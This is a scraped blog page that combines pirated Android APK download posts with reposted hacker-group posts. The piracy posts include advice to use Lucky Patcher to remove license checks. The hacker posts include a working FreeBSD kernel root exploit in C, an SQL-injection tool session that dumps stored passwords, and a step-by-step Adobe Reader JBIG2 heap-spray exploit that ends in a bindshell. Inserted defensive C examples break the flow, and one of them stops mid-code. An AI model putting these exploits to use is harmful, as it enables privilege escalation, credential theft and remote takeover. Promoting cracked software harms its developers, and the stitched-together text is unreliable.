Sunday, 30 September 2012

Flow Powered 1.2 APK


Flow Powered v1.2 APK Free 4shared Mediafire Download Android

Requirements: Android 2.3.3 or higher
Overview: Flow Powered by Amazon is an augmented reality app that lets you discover information about everyday products around you.

With Flow you can identify tens of millions of products, including books, DVDs, and packaged household items like a box of cereal or a box of tissues.
To get started, point your camera at
- Book covers
- Video games
- DVDs & CDs
- Packaged goods like games and toys
- A box of cereal.
Flow will also decode
- UPC barcodes
- QR codes.
Flow uses A9.com's continuous scan technology to automatically recognize items available on Amazon.com, and overlay product information using augmented reality.
Once you launch the app, aim your camera towards the items you want to identify. Flow will begin recognizing items immediately. Move your phone from one product to the next, and information is automatically delivered to the screen. For some products, media previews, like audio clips or video clips, can be viewed almost instantly.
If you want to learn more about a given item, or find out about related items, or read customer reviews, tap on the product information preview that appears on the screen. You can also share product details with friends via email, or Twitter, or make purchases on Amazon.com.
Flow’s app menu lets you trigger its History, among other features, giving you access to all your scanned items, sorted by date, product category, item name, or scan type.

Download here

http://www.filehost.ws/3ojgokoidpne

Direct Download

http://depositfiles.com/files/6i6jumx78


BeNaughty 2.8.16 APK

This summary is not available. Please click here to view the post.

EasyProfiles (Pro) 4.7.8 APK


EasyProfiles (Pro) v4.7.8 APK Free 4shared Mediafire Download Android

Requirements: Android 2.1 and up, Lucky Patcher
Overview: Define profiles and switch between them both manually and automatically.

Profile Attributes are:

WIRELESS CONTROLS
- Airplane mode
- Bluetooth
- GPS* *G
- Wifi
- AutoSync
- background data *R
- data roaming *R
- Mobile network* *G (Attention Froyo users: You have to enable mobile data connection in the system settings, before EasyProfiles is able to switch it!)
- Radio (toggles only phone/SMS connection) *G
- APN settings
- 2G/3G/4G switch *R (GSM only!)
- 4G / WiMAX*
- Hotspot*

DISPLAY
- Automatic screen brightness
- Screen brightness
- Display timeout
- AutoRotate
- Wallpaper (Animated wallpapers only *R!)
- patternlock switch *R

SOUND
- Ringer mode
- Ringer volume
- Notification vibration
- Notification volume
- System volume
- Media volume
- Speaker mode (use phone as hands free device)
- Ringtone
- Notification tone
- Sound effects
- Haptic feedback
- Dtmf tone when dialing

ADVANCED FEATURES
- Ringer group exception*
(You may define contact groups and add all persons to it that need exceptional handling. I.e. all incoming calls that belong to one of the specified groups are suppressed, if the ringer is on. And vice versa if the ringer is off, these calls are indicated by normal ringer sounds.)
- SMS group exception* (Same as Ringer group exception, but this attribute considers SMS instead of calls.)
- Suppress individual contact ringtones*
- Screenlock*
- Automatically Answer Calls
- HTC Scene*
- Preferred Input Method *R
- Ringer Volume lock

Automatic Profile Switches based on:
- Time
- Weekday
- currently activated profile
- detected/missing Motion
- Bluetooth connection/disconnection
- Wifi connection/disconnection
- Headphones (plugged in/out)
- Battery Level
- Charging state
- Calendar Entry* (with keywords)
- Activation Time (limit waiting for another event to specified time, then fire independently)
- Location (based on mobile phone cells or visible wifi hotspots or GPS)
- Car / Desk Docking station
- Foreground Application (upon start or stop)

Additionally define actions on events and/or profile (de-)activation:
- Start Application
- Stop Application* (not available on FROYO)
- Notify (Notify yourself on an event)
- Send SMS
- Call a number (enables call forwarding)
- Locale Plugin Setting (use all "locale" plugins also in EasyProfiles!)
- Reboot *R
- Execute shortcut (Especially in combination with GScript this becomes a very powerful extension!)

Additionally EasyProfile itself is able to act as a locale settings plugin, so you can switch profiles also from other apps (like e.g. tasker).

* These features use non-public API or hidden functions. It is possible that some of them do not work on every combination of device and android version.
It is possible that they then do not work as expected or at all. There is no guarantee that they will work on future Android versions.

*G These features are not available on unrooted devices using android 2.3 or later.

*R These features are only available on rooted devices.

We have no possibility to answer on comments at the market. Please send an email if you have an issue. We will then help to find the reason.

Read more details and changelog on http://SmartDyne.de/easyprofiles

Note: Use Lucky Patcher to remove license verification

What's in this version:
4.7.8:
Fixed issue with volume lock on ICS and split volumes
Fixed issue regarding endless volume toggle loop
Improved Simplified Chinese, French and Spanish translations


Download here

http://1hostclick.com/2u53h4qwcuv2/EasyProfiles__Pro__v4.7.8.zip.html

Direct Download

http://rapidgator.net/file/22914316/EasyProfiles_(Pro)_v4.7.8.zip.html


Android Voice Xtreme 2.19 APK


Android Voice Xtreme v2.19 APK Free 4shared Mediafire Download Android

Requirements: Android 2.2 and up
Overview: The only voice interface you'll need. AVX is the most full-featured virtual assistant for Android!



Who should use AVX? If you are looking for an application that provides hands-free operation of your phone to open apps, read and reply to text messages and email, schedule calendar events and many more functions that you can perform using just your voice, then AVX is right for you.

If you are just looking for an electronic friend to chat with then please go with one of the Siri clones. On the other hand if you want a real virtual assistant that has useful functions that will make your life easier then please give AVX a try.

AVX has all the functions you'd expect your assistant to perform plus some that you probably never knew were possible. Here is a list of some of the functions that you won't find in most of the competition:

Features:
Reading and replying to incoming text and email including Microsoft Exchange
Integration with Evernote
Home Automation with INSTEON. Turn on the lights and appliances, open the garage door and a whole lot more, all with voice commands or scheduled or based on your location.
Location based reminders. Remind you to do something based on your location.
Location based actions. Perform any function that AVX can do based on your current location. Have AVX automatically text your wife when you leave the office.
Time based actions. Perform any function that AVX can do on a set day and time
In car mode including wake up phrase
Custom voice shortcuts to your phone applications. Give your apps any name you want and open them using that name.
Voice bookmarks to your favorite web sites. Give your bookmarks any name you want and open them using that name.
Activate just by shaking your phone
Works with all Bluetooth Headsets

What's in this version:
*BLUETOOTH AND WAKE MODE IMPROVEMENTS
*NEW MESSAGING FEATURES (NEW VIDEO)
*INTEGRATION WITH TASKER (NEW VIDEO)
*QUICK START HELP MENU
*HANDS-FREE READ AND REPLY TO FACEBOOK FEED. SEE VIDEO
*SPEAK AND PROMPT MESSAGE MODE
*IMPROVED SCREEN LOCK/WAKE WITH PROFILES
*CLEANER SETTINGS LAYOUT
*NEW VIDEO FOR USING PROFILES
*NEW SETTINGS PROFILES
*EVERNOTE INTEGRATION
*MICROSOFT EXCHANGE INTEGRATION
*LOCATION BASED ACTIONS, REMINDERS


Download here

http://1hostclick.com/6l92kmd9tkoe/Android_Voice_Xtreme_v2.19.apk.html

Direct Download

http://rapidgator.net/file/22901533/Android_Voice_Xtreme_v2.19.apk.html


Textgram Pro 1.79 APK


Textgram Pro v1.79 APK Free 4shared Mediafire Download Android

Requirements: Android 2.1 and up
Overview: Create beautiful graffiti and share them with your friends on Facebook, Instagram, Whatsapp, Streamzoo, etc.. or save them in your gallery.



** Pro Features **
* Text Rotation
* Frames
* No Ads


What's in this version:
__ v1.79 __
* Store is now working, you can get many extra free backgrounds and fonts.

Download here

http://1hostclick.com/nhlmyuhscwof/Textgram_Pro_v1.79.apk.html

Direct Download

http://rapidgator.net/file/22899093/Textgram_Pro_v1.79.apk.html


Saturday, 29 September 2012

ZPlayer 3.2.03 Build 105 APK


ZPlayer 3.2.03 Build v105 APK Free 4shared Mediafire Download Android

Requirements: Android 2.1 and up
Overview: Windows Phone 7 / Zune themed media player for Android OS.
You might need to uninstall the application before upgrading to version 3.x: some database changes have made the application crash after upgrading, but a new installation (or clearing application data) should fix the issue.

Welcome to ZPlayer a Windows Phone 7 / Zune themed player, a better richer and more interactive media player.
Get album reviews, artist biographi

Now with more widgets, fast forward and rewind controls, headset controls, home screen customization, equalizer, audio effects. You can start with your own media, and learn about other artists, other tracks and what other people are listening to. Pair this media player with a last.fm account and submit likes, now playing status, and scrobble tracks.

*note: The application uses the Android framework Audio Effect API, which was introduced in Android 2.3. Therefore only devices running at least Android 2.3 will be able to take advantage of this feature.

++ if you use a third party equalizer that controls the output mix for all media playing on the device, disable it before using this application. This application needs to control its own audio effects.

-audio effects implemented include Equalizer, Bassboost and Virtualizer based on Android 2.3

What's in this version:
bug fixes
Android 4.1 support


Download here

http://1hostclick.com/zl8j1p2onesm/ZPlayer_v3.2.03_Build_105.apk.html

Direct Download

http://rapidgator.net/file/22895435/ZPlayer_v3.2.03_Build_105.apk.html


FreeBSD Local Root Privilege Escalation Vulnerability Hits Like a Ton of Bricks


We've been following the recent FreeBSD Security Advisory http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc . This vulnerability allows us to write data within kernel memory itself. Nice work to Don and the original discoverer, Christer Oberg.


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

uname -rs
FreeBSD 7.0-RELEASE
id
uid=1001(donb) gid=1001(donb) groups=1001(donb),0(wheel)
grep ^root /etc/master.passwd
grep: /etc/master.passwd: Permission denied
nm /boot/kernel/kernel | grep allproc
c0bf26b8 B allproc
c0bf2670 B allproc_lock
cc -o x x.c
./x 0xc0bf26b8
euid=0
id
uid=1001(donb) gid=1001(donb) euid=0(root) groups=1001(donb),0(wheel)
grep ^root /etc/master.passwd
root:$1$fuS6o3Qy$iFlUEpD9Y3ph7rOzMU/br1:0:0::0:0:Charlie &:/root:/bin/csh


Happy holidays, all!

D
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)

iEYEARECAAYFAklUla4ACgkQttfe3HwtctN/fgCeJDmmpOK8bn1dnssxOkTZXdUg
idUAmwdyoMZnoEfnrR14TQlRDli9mv+j
=Pixh
-----END PGP SIGNATURE-----


/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
    struct proc * p = (struct proc * )PATTERN1;
    uint * i;

    while(1)
    {
        if(p->p_pid == PATTERN2)
        {
            i = (uint * )p->p_ucred;
            *++i = 0;
            break;
        }

        p = p->p_list.le_next;
    }

    return 1;
}

int
main(int argc, char * argv[])
{
    ulong addr;
    uchar * c;
    uchar * d;
    uint * i;
    void * v;
    int pid;
    int s;

    if(argc != 2)
    {
        fprintf(stderr, "usage: ./x <allproc>\n");
        return 1;
    }

    addr = strtoul(argv[1], 0, 0);

    v = mmap(
        NULL,
        (PAGES*PAGE_SIZE),
        PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_ANON|MAP_FIXED,
        -1,
        0);
    if(v == MAP_FAILED)
    {
        perror("mmap");
        return 0;
    }

    c = v;
    d = (uchar * )x;
    while(1)
    {
        *c = *d;
        if(*d == 0xc3)
        {
            break;
        }

        d++;
        c++;
    }

    *c++ = 0xc3;

    c = v;
    while(1)
    {
        if(*(long * )c == PATTERN1)
        {
            *(c + 0) = addr >> 0;
            *(c + 1) = addr >> 8;
            *(c + 2) = addr >> 16;
            *(c + 3) = addr >> 24;
            break;
        }
        c++;
    }

    pid = getpid();
    while(1)
    {
        if(*(long * )c == PATTERN2)
        {
            *(c + 0) = pid >> 0;
            *(c + 1) = pid >> 8;
            *(c + 2) = pid >> 16;
            *(c + 3) = pid >> 24;
            break;
        }
        c++;
    }

    s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
    if(s < 0)
    {
        perror("socket");
        return 1;
    }

    shutdown(s, SHUT_RDWR);

    return 0;
}
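The root cause the advisory linked above describes is a protocol whose user-request table has no handler for some operations, so a call such as shutdown() on that socket dispatches through a NULL pointer; that is why the exploit's first step is to map page zero. As an added example (not the FreeBSD kernel's code; the struct and function names are hypothetical stand-ins for protosw and its user-request table), the toy model below places the unchecked dispatch beside a call-site check and beside the registration-time fix of pointing every empty slot at a not-supported stub:

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>

/* Toy model of a protocol switch and its user-request table. The names
 * are hypothetical and are not FreeBSD's struct protosw / pr_usrreqs. */
typedef int (*pru_fn)(int sock);

struct toy_usrreqs {
    pru_fn pru_attach;
    pru_fn pru_send;
    pru_fn pru_shutdown;
};

struct toy_protosw {
    const char *pr_name;
    struct toy_usrreqs pr_usrreqs;
};

static int toy_attach(int sock) { (void)sock; return 0; }
static int toy_send(int sock)   { (void)sock; return 0; }

/* Safe default for every operation a protocol does not implement. */
static int pru_notsupp(int sock) { (void)sock; return EOPNOTSUPP; }

/* The pattern the advisory describes: the table entry is called as-is,
 * so a NULL slot becomes a call through address 0 in kernel context. */
int shutdown_unchecked(const struct toy_protosw *p, int sock)
{
    return p->pr_usrreqs.pru_shutdown(sock);
}

/* Call-site hardening: refuse to dispatch through a NULL slot. */
int shutdown_checked(const struct toy_protosw *p, int sock)
{
    if (p->pr_usrreqs.pru_shutdown == NULL)
        return EOPNOTSUPP;
    return p->pr_usrreqs.pru_shutdown(sock);
}

/* Registration-time hardening: audit the whole table once and point every
 * NULL slot at pru_notsupp, so no call site has to remember the check.
 * Returns the number of slots that were filled. */
int protosw_fill_defaults(struct toy_protosw *p)
{
    pru_fn *slots[] = {
        &p->pr_usrreqs.pru_attach,
        &p->pr_usrreqs.pru_send,
        &p->pr_usrreqs.pru_shutdown,
    };
    int filled = 0;
    for (size_t i = 0; i < sizeof slots / sizeof slots[0]; i++) {
        if (*slots[i] == NULL) {
            *slots[i] = pru_notsupp;
            filled++;
        }
    }
    return filled;
}

/* Constructed entry that, like the protocols covered by the advisory,
 * never provided a shutdown handler. */
struct toy_protosw toy_ng_proto = { "toy_ng", { toy_attach, toy_send, NULL } };

int main(void)
{
    /* Only the checked path is safe to call before the table is audited. */
    printf("checked shutdown before audit: %d (EOPNOTSUPP is %d)\n",
           shutdown_checked(&toy_ng_proto, 3), EOPNOTSUPP);
    printf("slots filled by audit: %d\n", protosw_fill_defaults(&toy_ng_proto));
    printf("unchecked shutdown after audit: %d\n",
           shutdown_unchecked(&toy_ng_proto, 3));
    return 0;
}
```

Filling the table once at registration is the more robust of the two fixes, because it does not depend on every call site remembering the NULL test; the call-site check is what protects a table that was not audited.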

back on a mission and ready to ride

So we have decided to bring the blogs back for a bit to let some of our members post to. There's been a lot of activity since the holidays have ended. We're currently looking into alternative heap spraying techniques that don't utilize Java, are in the process of researching several MS vulns (namely MS09-001 atm), and have been doing a bit of reversing to make some security software play nice.

More posts coming soon - xort

A race for MS09 (001) ... get ready for inet crime!

An update on our analysis of MS09-001's patch provided in KB958687. The patch fixes a vulnerability in Microsoft's SMB handling code. An unauthenticated attacker can connect to a host on a local LAN over SMB or utilize DCERPC/SMB over the internet in order to access a vulnerable host.

We have spent the past day looking into what exactly was patched and have determined that the patch fixes 5 functions in srv.sys that can theoretically lead to remote execution of code (This has yet to be confirmed - nor debunked...).

The functions patched in srv.sys are:

SrvSmbWriteMpx()
SrvIpxServerDatagramHandlerCommon()
SrvSmbWriteRaw()
SrvSmbWriteAndX()
SrvSmbOpen()

Our group has already produced functioning code that can in part trigger these functions in the manner that is needed to trigger the (3) vulnerabilities discussed in the zeroday initiative's advisories. Trans/Trans2 here we come :D

The funny thing is, no one else seems to have posted any information on this or is really getting close to exploiting this in the public domain. What's the deal? Well - blacksec will have to keep ya' updated with the juicy details while the girls catch up eh?

-xort/bannedit-

Str0ke @ Milworm's Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessings to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

:o(

rip str0ke

Friday, 28 September 2012

MS09-001 followup - Just DoS bugs?

It appears that the 3 vulnerabilities covered in MS09-001 do not lead to code execution. We spent the last few days really tearing into these and could not produce any conditions that were controllable that would lead to code execution. The ANDX bug had already been determined to be simply a DoS but it was thought that the NTTRANS/TRANS2 bugs could lead to code execution. Upon further review, we found that in the case of both bugs, a buffer underflow could be caused in which a buffer would be allocated with not enough memory, which would later be zeroed out in the SMB processing functions of transaction requests. It was here that the now corrupted system heap pool would crash in srv.sys during a pool bugcheck. The crashes can actually be triggered a number of ways - leading to a similar crash - just with different origins. We're still looking into possible avenues of traversing the MPX functionality but as for now... code execution does not look possible.

Think the group will try to spend some time this week looking at other possible vulnerable functionality in SMB. Seems like there is a lot of room for error.

-xort

MsSQL SQL Injection Data Crawling - Tool Updated

We've recently updated the functionality of the sqlidiscover.pl tool used for enumerating SQL databases, tables, columns and data fields. We've included support for adding custom cookies to your request.

http://blacksecurity.org/tools/42/sqlidiscover___MsSQL_SQL_Injection_Data_Crawler/124.html



sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
usage: sqlidiscover [-G|-P] [-v] [-b] [-phostname:port] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL

-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vuln/file.asp
-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN



Here's an actual example:

jinxy ~ # perl sqlidiscover.pl -c ASPSESSIONIDSSSTRCDB:KCMLJILCJGPBJELANCFHCNGL -v -G -iProductID http://www.example.com/catalog/view.asp
sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
[*] HTTP cookie set to ASPSESSIONIDSSSTRCDB=KCMLJILCJGPBJELANCFHCNGL
[*] URL to process: http://www.example.com/catalog/view.asp
[*] Abusing 'ProductID'...

[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo


unknown_db.test> help
sqliinjection interactive session help

exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).

------------------------------------------------------------

unknown_db.test> select database demo
Changing context to demo.test

demo.test> select table Users

Changing context to demo.Users

demo.Users> discover columns

[*] Enumerating columns for table Users
[+] Column search: found: (0) AccountNumber
[+] Column search: found: (1) Address
[+] Column search: found: (2) Email
[+] Column search: found: (3) Name
[+] Column search: found: (4) Password
[+] Column search: found: (5) Phone
[+] Column search: found: (6) Username
[+] Column search finished, 6 found


demo.Users> fetch Username, Password, Name
[+] Using columns Username, Password, Name
[*] Retrieving information for table demo.Users
[+] 3 columns selected for data retrieval
| Username | Password | Name
| admin | demo | Demo
| superadmin | master | Master Admin

Blinded w/ VNC Viewer vulns.

Well, a few things to report here in the blackbl0gs. Firstly, I've spent the past few days looking into/writing exploits for these recent VNC viewer vulns in the RFB protocol. The first vulnerability affects Real VNC viewer <=4.1.2 (CVE-2008-4770). This vulnerability is triggered when incorrect information is passed to CMsgReader::readRect() which can lead to an integer underflow in allocation space. The remaining data in the packet following the allocation size is then copied into the buffer allocated on the stack, leading to an SEH overwrite. The second vulnerability, which we're currently looking into accurately exploiting, is a vulnerability in TightVNC <=1.3.9 (CVE-2009-0388). In this vulnerability malicious data can be passed to a Tvnc subfunction in which a null byte overwrite can be triggered via an integer over/underflow @ HeapPointer + ControllableValue. Lotsa fun other hacks going in the priv8 arena.

ttfn, -xort
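Both the MS09-001 follow-up above (a buffer "allocated with not enough memory" that is later zeroed) and the RealVNC readRect bug (an integer underflow in the allocation size) are instances of one failure mode: a size derived from an attacker-supplied length by subtraction, with no check that the length covers the fixed header or matches the bytes actually received. The code below is an added example, not code from either product or from the posts; the 8-byte-header message format and the three sample messages are constructed for the illustration, and the unchecked routine is shown only so the wrapped value can be compared with the checked one.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical request layout (not the real SMB or RFB encoding):
 *   bytes 0..3  declared total length, big-endian
 *   bytes 4..7  reserved
 *   bytes 8..   payload, declared_total - HDR_LEN bytes long
 */
#define HDR_LEN 8u

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Vulnerable size arithmetic: when the declared total is smaller than the
 * header the unsigned subtraction wraps, and nothing ties the result to the
 * number of bytes actually received. Fed to an allocator, the result is a
 * buffer that the later copy or zeroing overruns. */
uint32_t payload_len_unchecked(const uint8_t *buf)
{
    return be32(buf) - HDR_LEN;
}

/* Hardened: check before subtracting, and never trust the declared total
 * beyond the bytes in hand. Returns SIZE_MAX on rejection. */
size_t payload_len_checked(const uint8_t *buf, size_t received)
{
    if (received < HDR_LEN)
        return SIZE_MAX;                 /* header itself is incomplete */
    uint32_t declared = be32(buf);
    if (declared < HDR_LEN)
        return SIZE_MAX;                 /* would underflow */
    if (declared > received)
        return SIZE_MAX;                 /* declares more than was received */
    return (size_t)declared - HDR_LEN;
}

/* Allocate a zeroed buffer and copy the payload only when the checks pass.
 * Writes the payload length to *out_len; returns NULL on rejection. */
uint8_t *copy_payload(const uint8_t *buf, size_t received, size_t *out_len)
{
    size_t n = payload_len_checked(buf, received);
    if (n == SIZE_MAX)
        return NULL;
    uint8_t *p = calloc(n ? n : 1, 1);
    if (p == NULL)
        return NULL;
    memcpy(p, buf + HDR_LEN, n);
    *out_len = n;
    return p;
}

/* Constructed sample messages. */
const uint8_t MSG_OK[]    = {0, 0, 0, 12, 0, 0, 0, 0, 'a', 'b', 'c', 'd'}; /* honest */
const uint8_t MSG_SHORT[] = {0, 0, 0,  4, 0, 0, 0, 0, 'a', 'b', 'c', 'd'}; /* total < header */
const uint8_t MSG_LIE[]   = {0, 0, 0, 64, 0, 0, 0, 0, 'a', 'b', 'c', 'd'}; /* total > received */

/* Self-check: the honest message round-trips through copy_payload. */
bool sample_roundtrip_ok(void)
{
    size_t n = 0;
    uint8_t *p = copy_payload(MSG_OK, sizeof MSG_OK, &n);
    bool ok = p != NULL && n == 4 && memcmp(p, "abcd", 4) == 0;
    free(p);
    return ok;
}

int main(void)
{
    printf("unchecked length for MSG_SHORT: %u\n",
           (unsigned)payload_len_unchecked(MSG_SHORT));
    printf("MSG_SHORT rejected by checked path: %s\n",
           payload_len_checked(MSG_SHORT, sizeof MSG_SHORT) == SIZE_MAX ? "yes" : "no");
    printf("MSG_LIE rejected by checked path: %s\n",
           payload_len_checked(MSG_LIE, sizeof MSG_LIE) == SIZE_MAX ? "yes" : "no");
    printf("MSG_OK round trip: %s\n", sample_roundtrip_ok() ? "ok" : "FAILED");
    return 0;
}
```

The third check (declared total against bytes received) is the one most often missing: an honest-looking length that is merely larger than the packet still drives a copy past the end of the receive buffer even when no underflow occurs.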

Adobe Acrobat/Reader Universal Exploit : APSB09-01 (aka CVE-2009-0658)

Hey gang,
Been a few days since our last post, but not to worry! Still lots of fun stuff happening in the blacksec community. Our latest post is a brief analysis of the jbig2 vulnerability recently patched by Adobe in APSB09-01 (aka CVE-2009-0658). What I thought was particularly interesting (although not surprising, given vendors' actual understanding of the vulnerabilities that typically affect their software) was its classification: "Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat". The actual bug stems from a pointer-indexing issue when utilizing a specifically crafted JBIG2 structure.

Bugs like this are fun, because they can often lead to multiple different avenues that in turn can be leveraged for execution. We were able to gain control of execution through the use of some careful heap spraying that would both create 1/2 a sprayed area of pointers that are later loaded and used in a controlled write operation followed by another 1/2 of your typical nopsled/shellcode heapspraying. Combine this spraying with the time used to allocate the memory being used and you could easily overwrite low-addressed (static) module entry points. There's a little more to this, so let's dig in...

Let's begin with the original crash mentioned in the snort VRT blog posting (http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html). From the posting:

"the 5th byte into the stream (which is the segment header flag byte) were to have the 6th bit set indicating a large page association size:

00 00 00 01 40 00 00 33 33 33"

Here, we can see the beginning of our long road to exploitation. After modifying the segment header flag of our JBIG2 stream, we are able to embed a controllable (big endian!) pointer beginning at the 2nd byte following the segment header flag. Using the values described in the original advisory, we can trigger a crash at the first (0387298A - Add operation) location as seen below.

03872979 |. 8B41 1C MOV EAX,DWORD PTR DS:[ECX+1C]
; our (big endian) pointer gets loaded into EAX
0387297C |. 85C0 TEST EAX,EAX
0387297E |. 0F84 AC020000 JE Acroba_1.03872C30
03872984 |. 8B4E 10 MOV ECX,DWORD PTR DS:[ESI+10]
; The base-index register gets loaded into ECX
03872987 |. 8D0480 LEA EAX,DWORD PTR DS:[EAX+EAX*4]
; EAX gets multiplied by 5
0387298A |. 834481 EC 01 ADD DWORD PTR DS:[ECX+EAX*4-14],1
; ECX+ EAX*4 - the value at this location gets incremented.

Here ECX varies in its exact location but generally lands in the ~02xxxxxx range. If we craft some generic heap spraying code, we can allocate blocks of memory within a specified distance of this pointer. So, after adding the heap spraying code we can see a nice area of memory that gets allocated 0x082xxxxx-0x0fexxxxx bytes (or 0x6200000 to 0xDE00000 bytes away). This area is located after Cooltype and before acaptuse in memory. If we look back at the assembly from the first crash area we can see our pointer gets multiplied by 5 first and then multiplied by 4 again in the following operation (you'll see below this same logic is repeated in the second crash). Applying this logic, if we use a value such as 0x00666666, it will first be multiplied by 5 to give us 0x01FFFFFE and then multiplied by 4 again to finally equal 0x07FFFFF8. This drops us right in the middle of our first large heap sprayed area and allows us to continue on to the second crash location.

03872BC7 |> 8B0CBB /MOV ECX,DWORD PTR DS:[EBX+EDI*4]
03872BCA |. 8B41 1C |MOV EAX,DWORD PTR DS:[ECX+1C]
; our (big endian) pointer gets loaded into EAX
03872BCD |. 8B56 10 |MOV EDX,DWORD PTR DS:[ESI+10]
; EDX points to the same base we used before in ECX
03872BD0 |. 8D0480 |LEA EAX,DWORD PTR DS:[EAX+EAX*4]
; EAX gets multiplied by 5
03872BD3 |. 8D4482 EC |LEA EAX,DWORD PTR DS:[EDX+EAX*4-14]
; the address of where we performed our last ADD at the first crash location gets
; loaded into EAX
03872BD7 |. 8B50 04 |MOV EDX,DWORD PTR DS:[EAX+4]
; HEAPSPRAY_AREA+0x4 gets loaded into EDX
03872BDA |. 85D2 |TEST EDX,EDX
; make sure this isn't 0!
03872BDC |. 74 0A |JE SHORT Acroba_1.03872BE8
03872BDE |. 8B68 10 |MOV EBP,DWORD PTR DS:[EAX+10]
; HEAPSPRAY_AREA+0x10 gets loaded into EBX
03872BE1 |. 890CAA |MOV DWORD PTR DS:[EDX+EBP*4],ECX
; a pointer to our struct gets written to anywhere we want

Here, we crash at the second location with the values EDX and EBX equaling 0x90909090. Basically, we can overwrite any portion of (writable) memory with a pointer to our struct. We accomplish this by making the first 100-300 of our heap spray operations (of typically 1000) with [x][y][x][y][x][y][x][y] style alternating pointers where x is the value we want to overwrite and y is 0 (used in EBX*4). Other values can be used here but you get the general idea.

Let's focus now on what's at the pointer we're able to write to anywhere in memory.

This is our stream from our file:

stream.....@.........,...H...........
73 74 72 65 61 6D 0A [00000001] 40 00 00666666 [13000007] 2C 00 00 09

Certain bytes have been separated and put into brackets to help visualize their exact locations when loaded into memory.

When the second crash occurs ECX points to the following memory data:

010B60F0 [01 00 00 00]00 62 01 00 00 00 2F 44 00 00 75 6D ....b.../D..um
010B6100 00 00 00 00 25 32 30 61 6E 64 25 32 F4 FF FF FF ....%20and%2ôÿÿÿ
010B6110 [07 00 00 13]00 00 72 75 62 D0 A2 01 0C 6B BA 00 ......rubÐ¢..kº.


As you can see, we control the 2 (little endian) pointers at [ECX] and [ECX+0x20] and can place whatever values we wish at these locations by manipulating the stream in our malformed pdf. Our solution was to simply place a "CALL [ECX+0x20]" at the first location where we land (after overwriting a called pointer) and to stick wherever we want to land at [ECX+0x20] (or right after our index pointer in our jbig2 stream).

So, what to overwrite? We spent a day or two looking for static areas of memory that were to be accessed after the crash that would lead to execution. In the end, we decided to take advantage of the Module Entry point of kernel32 located in the 0x00251xxx range. These locations will vary based on SP/pdf you have created but after a little math can be statically calculated.

00251FD8 7C800000 kernel32.7C800000
00251FDC 7C80B63E kernel32. ; <- what we clobber!
00251FE0 000F6000
00251FE4 00420040 Acrobat.00420040
00251FE8 00251F70 UNICODE "C:\WINDOWS\system32\kernel32.dll"
00251FEC 001A0018
00251FF0 00251F98 UNICODE "kernel32.dll"
00251FF4 80084004

This is called not too long after our heap spraying has completed and our overwrite has succeeded. This leaves only one last step, to toss your fav high mem address into ECX+0x20. We chose to use something simple, 0x13131313 - which lands in the second portion of our heap spraying code. This technique works both on acrobat/reader 9 with the same offsets :D:D:D. One, two, twenty-three, four...adobe bindshell landing at your door.

C:\Documents and Settings\Administrator\Desktop> telnet localhost 5500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>


Bindshell Exploit

- xort & redsand
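The input the post keeps coming back to is the JBIG2 segment header: flag bit 6 selects a 4-byte page association, and the crafted streams put a large value in that field, which the decoder then used as an index without a bound check. Below is an added example of the defensive side of that, written for this page and not taken from Adobe's code or from the post: a bounds-checking parser for the segment header as laid out in the JBIG2 spec (segment number, flags, referred-to segments, page association, data length). It refuses a page association above a configured page limit and a data length longer than the bytes that follow. MAX_PAGES and the function names are assumptions; the two inputs labelled as the post's streams are the bytes quoted above, the other two are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical policy limit on page numbers a decoder is willing to index. */
#define MAX_PAGES 4096u

enum jb2_status {
    JB2_OK = 0,
    JB2_TRUNCATED,     /* header runs past the end of the buffer */
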